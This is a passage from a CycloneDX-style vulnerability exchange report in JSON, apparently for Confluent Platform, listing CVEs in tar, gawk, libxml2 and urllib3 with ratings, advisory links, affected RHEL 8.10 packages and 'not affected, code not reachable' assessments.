          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-39804",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-39804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-39804"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1058079"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39804"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-39804"
        }
      ],
      "published": "2024-03-27T04:15:08+00:00",
      "updated": "2026-06-17T06:12:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-4156",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-4156"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-4156"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215930"
        },
        {
          "url": "https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00000.html"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4156"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6373-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-4156"
        }
      ],
      "published": "2023-09-25T18:15:11+00:00",
      "updated": "2026-06-17T06:37:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45322",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is \"I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45322"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/10/06/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45322"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/344"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/583"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45322"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
        }
      ],
      "published": "2023-10-06T22:15:11+00:00",
      "updated": "2026-06-17T06:28:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45803",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45803"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:11238"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45803"
        },
        {
          "url": "https://bugzilla.redhat.com/2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/2257028"
        },
        {
          "url": "https://bugzilla.redhat.com/2257854"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246840"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45803"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2132.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:11238"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-45803.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2988.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7762-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
        }
      ],
      "published": "2023-10-17T20:15:10+00:00",
      "updated": "2026-06-17T06:29:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
